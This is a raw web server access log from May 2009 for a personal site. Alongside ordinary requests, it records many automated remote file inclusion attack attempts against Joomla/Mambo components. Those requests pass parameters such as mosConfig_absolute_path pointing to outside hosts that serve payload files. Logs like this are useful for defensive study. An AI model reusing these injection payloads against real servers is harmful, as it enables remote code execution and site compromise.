118.219.232.137 - - [05/May/2009:10:29:48 -0700] "GET /logs/access_080520.log///administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.sunggong.tv/data/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
118.219.232.137 - - [05/May/2009:10:29:48 -0700] "GET //administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.sunggong.tv/data/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
118.219.232.137 - - [05/May/2009:10:29:48 -0700] "GET /logs///administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.sunggong.tv/data/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
118.219.232.137 - - [05/May/2009:10:29:48 -0700] "GET /logs/access_080807.log///administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.sunggong.tv/data/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.41 - - [05/May/2009:10:29:48 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
194.151.161.240 - - [05/May/2009:10:30:03 -0700] "GET /logs/access_080329.log%20%20/errors.php?error=http://pallmall11.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.41 - - [05/May/2009:10:30:08 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
64.182.124.1 - - [05/May/2009:10:30:19 -0700] "GET /index.php?option=com_zoom&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.fileden.com/files/2009/5/4/2429585/a.txt?? HTTP/1.0" 200 43191 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.41 - - [05/May/2009:10:30:27 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
80.255.62.234 - - [05/May/2009:10:30:27 -0700] "GET /logs/access_080227.log HTTP/1.1" 200 786432 "http://www.alltheweb.com/search?advanced=1&cat=web&jsact=&_stype=norm&type=all&q=%40yahoo.com&itag=crv&l=en&ics=utf-8&cs=iso88591&wf%5Bn%5D=4&wf%5B0%5D%5Br%5D=%2B&wf%5B0%5D%5Bq%5D=%2B1&wf%5B0%5D%5Bw%5D=&wf%5B1%5D%5Br%5D=%2B&wf%5B1%5D%5Bq%5D=%40%40&wf%5B1%5D%5Bw%5D=&wf%5B2%5D%5Br%5D=%2B&wf%5B2%5D%5Bq%5D=%40yahoo.com&wf%5B2%5D%5Bw%5D=&wf%5B3%5D%5Br%5D=%2B&wf%5B3%5D%5Bq%5D=&wf%5B3%5D%5Bw%5D=&dincl=&dexcl=2009+++members+list++++.txt&geo=&doctype=text&dfr%5Bu%5D=on&dfr%5Bd%5D=1&dfr%5Bm%5D=1&dfr%5By%5D=2008&dto%5Bu%5D=on&dto%5Bd%5D=22&dto%5Bm%5D=4&dto%5By%5D=2009&hits=100" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10" "www.dmulk.com"
122.201.76.150 - - [05/May/2009:10:30:30 -0700] "GET /logs/access_080627.log/index.php?option=com_zoom&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
122.201.76.150 - - [05/May/2009:10:30:30 -0700] "GET /logs/index.php?option=com_zoom&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
122.201.76.150 - - [05/May/2009:10:30:30 -0700] "GET /logs/access_080826.log/index.php?option=com_zoom&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.182.124.1 - - [05/May/2009:10:30:52 -0700] "GET /index.php?option=com_zoom&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.fileden.com/files/2009/5/4/2429585/a.txt?? HTTP/1.0" 200 43191 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.41 - - [05/May/2009:10:30:55 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
64.182.124.1 - - [05/May/2009:10:30:58 -0700] "GET /logs/access_090308.log%20%20/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.fileden.com/files/2009/5/4/2429585/a.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
122.201.76.150 - - [05/May/2009:10:31:01 -0700] "GET /index.php?option=com_zoom&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 500 292 "-" "Mozilla/5.0" "www.dmulk.com"
64.182.124.1 - - [05/May/2009:10:31:03 -0700] "GET /logs/access_090221.log%20%20/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.fileden.com/files/2009/5/4/2429585/a.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.182.124.1 - - [05/May/2009:10:31:09 -0700] "GET /logs/access_090308.log%20%20/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.fileden.com/files/2009/5/4/2429585/a.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.182.124.1 - - [05/May/2009:10:31:14 -0700] "GET /logs/access_090221.log%20%20/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.fileden.com/files/2009/5/4/2429585/a.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.41 - - [05/May/2009:10:32:05 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
64.157.4.41 - - [05/May/2009:10:32:20 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
208.80.195.42 - - [05/May/2009:10:32:47 -0700] "GET / HTTP/1.0" 200 42772 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.50727; Media Center PC 4.0; IEMB3; IEMB3)" "www.dmulk.com"
118.219.232.137 - - [05/May/2009:10:33:27 -0700] "GET /logs///administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.sunggong.tv/data/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
118.219.232.137 - - [05/May/2009:10:33:27 -0700] "GET /logs/access_080520.log///administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.sunggong.tv/data/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
118.219.232.137 - - [05/May/2009:10:33:27 -0700] "GET //administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.sunggong.tv/data/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
118.219.232.137 - - [05/May/2009:10:33:27 -0700] "GET /logs/access_080807.log///administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.sunggong.tv/data/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
122.201.76.150 - - [05/May/2009:10:33:28 -0700] "GET /logs/access_080826.log%20%20/index.php?option=com_zoom&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
122.201.76.150 - - [05/May/2009:10:33:28 -0700] "GET /logs/access_080627.log%20%20/index.php?option=com_zoom&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.182.124.1 - - [05/May/2009:10:33:33 -0700] "GET /logs/access_080627.log%20%20/index.php?option=com_zoom&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.fileden.com/files/2009/5/4/2429585/a.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.182.124.1 - - [05/May/2009:10:33:38 -0700] "GET /logs/access_080826.log%20%20/index.php?option=com_zoom&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.fileden.com/files/2009/5/4/2429585/a.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.42 - - [05/May/2009:10:34:17 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
64.182.124.1 - - [05/May/2009:10:34:19 -0700] "GET /logs/access_080627.log%20%20/index.php?option=com_zoom&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.fileden.com/files/2009/5/4/2429585/a.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.182.124.1 - - [05/May/2009:10:34:26 -0700] "GET /logs/access_080826.log%20%20/index.php?option=com_zoom&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.fileden.com/files/2009/5/4/2429585/a.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.42 - - [05/May/2009:10:34:31 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
118.219.232.137 - - [05/May/2009:10:34:53 -0700] "GET /logs/access_080313.log///administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.sunggong.tv/data/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
118.219.232.137 - - [05/May/2009:10:34:53 -0700] "GET /logs///administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.sunggong.tv/data/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
118.219.232.137 - - [05/May/2009:10:34:53 -0700] "GET //administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.sunggong.tv/data/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
203.24.100.137 - - [05/May/2009:10:34:55 -0700] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/id.txt?? HTTP/1.1" 200 43209 "-" "libwww-perl/5.805" "www.dmulk.com"
75.145.124.113 - - [05/May/2009:10:35:01 -0700] "GET /bikes/dteel/Temp/IMG_3454s.JPG HTTP/1.1" 200 277018 "http://www.st-owners.com/forums/showthread.php?t=63518" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.0.10) Gecko/2009042315 Firefox/3.0.10" "dmulk.com"
194.151.161.240 - - [05/May/2009:10:35:09 -0700] "GET /logs/access_080313.log/?sourcedir=http://pallmall11.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
65.98.59.178 - - [05/May/2009:10:35:47 -0700] "GET /logs/errors.php?error=http://h1.ripway.com/lupa121/makan.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.dmulk.com"
65.98.59.178 - - [05/May/2009:10:35:48 -0700] "GET /errors.php?error=http://h1.ripway.com/lupa121/makan.txt??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "www.dmulk.com"
80.86.84.185 - - [05/May/2009:10:36:37 -0700] "GET /logs/access_081015.log//include/lib.inc.php?site_path=http://www.freewebtown.com/fatal2009/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
87.106.136.154 - - [05/May/2009:10:37:21 -0700] "GET /logs/access_080315.log/index2.php?mosConfig_absolute_path=http://www.gsmch.org/club/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.136.154 - - [05/May/2009:10:37:22 -0700] "GET /index2.php?mosConfig_absolute_path=http://www.gsmch.org/club/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.136.154 - - [05/May/2009:10:37:22 -0700] "GET /logs/index2.php?mosConfig_absolute_path=http://www.gsmch.org/club/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.9 - - [05/May/2009:10:38:03 -0700] "GET /logs/access_090304.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.lehrer-zimmer.net//components/com_simpleboard/Roseid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.9 - - [05/May/2009:10:38:04 -0700] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.lehrer-zimmer.net//components/com_simpleboard/Roseid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.9 - - [05/May/2009:10:38:04 -0700] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.lehrer-zimmer.net//components/com_simpleboard/Roseid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.9 - - [05/May/2009:10:38:14 -0700] "GET /logs/access_090304.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.lehrer-zimmer.net//components/com_simpleboard/Roseid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.9 - - [05/May/2009:10:38:15 -0700] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.lehrer-zimmer.net//components/com_simpleboard/Roseid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.9 - - [05/May/2009:10:38:15 -0700] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.lehrer-zimmer.net//components/com_simpleboard/Roseid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.136.154 - - [05/May/2009:10:38:18 -0700] "GET /logs/access_080112.log/index2.php?mosConfig_absolute_path=http://www.gsmch.org/club/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.9 - - [05/May/2009:10:38:36 -0700] "GET /logs/access_090321.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.lehrer-zimmer.net//components/com_simpleboard/Roseid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.9 - - [05/May/2009:10:38:46 -0700] "GET /logs/access_090321.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.lehrer-zimmer.net//components/com_simpleboard/Roseid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.202.11.155 - - [05/May/2009:10:39:17 -0700] "GET /logs/access_080217.log HTTP/1.1" 200 1114112 "-" "AISearchBot (Email: aisearchbot@gmail.com; If your web site doesn't want to be crawled, please send us a email.)" "www.dmulk.com"
72.30.81.171 - - [05/May/2009:10:39:30 -0700] "GET /logs/access_071109.log HTTP/1.0" 200 29983 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
218.150.79.146 - - [05/May/2009:10:40:12 -0700] "GET /logs/access_080601.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.junglephasereptiles.co.uk//components/com_sef/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.150.79.146 - - [05/May/2009:10:40:12 -0700] "GET /logs/access_090217.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.junglephasereptiles.co.uk//components/com_sef/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.150.79.146 - - [05/May/2009:10:40:12 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.junglephasereptiles.co.uk//components/com_sef/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.150.79.146 - - [05/May/2009:10:40:13 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.junglephasereptiles.co.uk//components/com_sef/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
194.151.161.240 - - [05/May/2009:10:40:27 -0700] "GET /logs/access_080412.log%20%20/?sourcedir=http://pallmall11.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
87.106.136.154 - - [05/May/2009:10:40:36 -0700] "GET /logs/access_090215.log/index2.php?mosConfig_absolute_path=http://www.gsmch.org/club/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.136.154 - - [05/May/2009:10:40:36 -0700] "GET /index2.php?mosConfig_absolute_path=http://www.gsmch.org/club/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.136.154 - - [05/May/2009:10:40:37 -0700] "GET /logs/index2.php?mosConfig_absolute_path=http://www.gsmch.org/club/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.93.147.154 - - [05/May/2009:10:40:44 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://h1.ripway.com/rina212/minum.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
200.93.147.154 - - [05/May/2009:10:40:45 -0700] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://h1.ripway.com/rina212/minum.txt??? HTTP/1.1" 200 50 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
87.106.136.154 - - [05/May/2009:10:40:53 -0700] "GET /logs/access_090223.log/index2.php?mosConfig_absolute_path=http://www.gsmch.org/club/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.136.154 - - [05/May/2009:10:40:54 -0700] "GET /index2.php?mosConfig_absolute_path=http://www.gsmch.org/club/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.136.154 - - [05/May/2009:10:40:54 -0700] "GET /logs/index2.php?mosConfig_absolute_path=http://www.gsmch.org/club/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.93.147.154 - - [05/May/2009:10:41:00 -0700] "GET /logs/access_081104.log//index2.php?mosConfig_absolute_path=http://h1.ripway.com/rina212/new.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.93.147.154 - - [05/May/2009:10:41:01 -0700] "GET /logs//index2.php?mosConfig_absolute_path=http://h1.ripway.com/rina212/new.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.151.161.240 - - [05/May/2009:10:41:07 -0700] "GET /logs/access_080831.log%20%20/?sourcedir=http://pallmall11.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
194.151.161.240 - - [05/May/2009:10:41:08 -0700] "GET /logs/access_080804.log/errors.php?error=http://pallmall11.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
194.151.161.240 - - [05/May/2009:10:41:08 -0700] "GET /logs/access_080329.log/errors.php?error=http://pallmall11.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
87.106.136.154 - - [05/May/2009:10:41:13 -0700] "GET /logs/access_081019.log/index2.php?mosConfig_absolute_path=http://www.gsmch.org/club/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.136.154 - - [05/May/2009:10:41:13 -0700] "GET /index2.php?mosConfig_absolute_path=http://www.gsmch.org/club/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.136.154 - - [05/May/2009:10:41:14 -0700] "GET /logs/index2.php?mosConfig_absolute_path=http://www.gsmch.org/club/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
222.236.44.45 - - [05/May/2009:10:41:27 -0700] "GET /logs//admin/index.php?o=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.236.44.45 - - [05/May/2009:10:41:27 -0700] "GET /admin/index.php?o=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.236.44.45 - - [05/May/2009:10:41:27 -0700] "GET /logs/access_090104.log%20%20//admin/index.php?o=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
118.219.232.137 - - [05/May/2009:10:41:37 -0700] "GET /logs///administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.sunggong.tv/data/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
118.219.232.137 - - [05/May/2009:10:41:37 -0700] "GET //administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.sunggong.tv/data/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
118.219.232.137 - - [05/May/2009:10:41:37 -0700] "GET /logs/access_090217.log///administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.sunggong.tv/data/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
118.219.232.137 - - [05/May/2009:10:41:43 -0700] "GET /logs/access_080601.log///administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.sunggong.tv/data/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.236.44.45 - - [05/May/2009:10:41:47 -0700] "GET /logs/access_080312.log%20%20//admin/index.php?o=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
87.106.136.154 - - [05/May/2009:10:41:48 -0700] "GET /logs/access_080225.log/index2.php?mosConfig_absolute_path=http://www.gsmch.org/club/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.204.145.214 - - [05/May/2009:10:41:50 -0700] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://designchambers.com.hk/components/com_plugins? HTTP/1.1" 404 275 "-" "libwww-perl/5.823" "www.dmulk.com"
118.219.232.137 - - [05/May/2009:10:41:56 -0700] "GET //administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.sunggong.tv/data/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
118.219.232.137 - - [05/May/2009:10:41:56 -0700] "GET /logs///administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.sunggong.tv/data/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
118.219.232.137 - - [05/May/2009:10:41:56 -0700] "GET /logs/access_090217.log%20%20///administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.sunggong.tv/data/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
118.219.232.137 - - [05/May/2009:10:42:01 -0700] "GET /logs/access_080601.log%20%20///administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.sunggong.tv/data/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
80.67.23.152 - - [05/May/2009:10:42:06 -0700] "GET /logs/access_071122.log//components/errors.php?error=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.23.152 - - [05/May/2009:10:42:07 -0700] "GET /components/errors.php?error=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.23.152 - - [05/May/2009:10:42:07 -0700] "GET /logs//components/errors.php?error=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.23.152 - - [05/May/2009:10:42:19 -0700] "GET /logs/access_071122.log//components/errors.php?error=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.23.152 - - [05/May/2009:10:42:19 -0700] "GET /components/errors.php?error=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.23.152 - - [05/May/2009:10:42:20 -0700] "GET /logs//components/errors.php?error=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
218.150.79.146 - - [05/May/2009:10:42:29 -0700] "GET /logs/access_080213.log%20%20/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.junglephasereptiles.co.uk//components/com_sef/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.150.79.146 - - [05/May/2009:10:42:36 -0700] "GET /logs/access_080708.log%20%20/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.junglephasereptiles.co.uk//components/com_sef/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
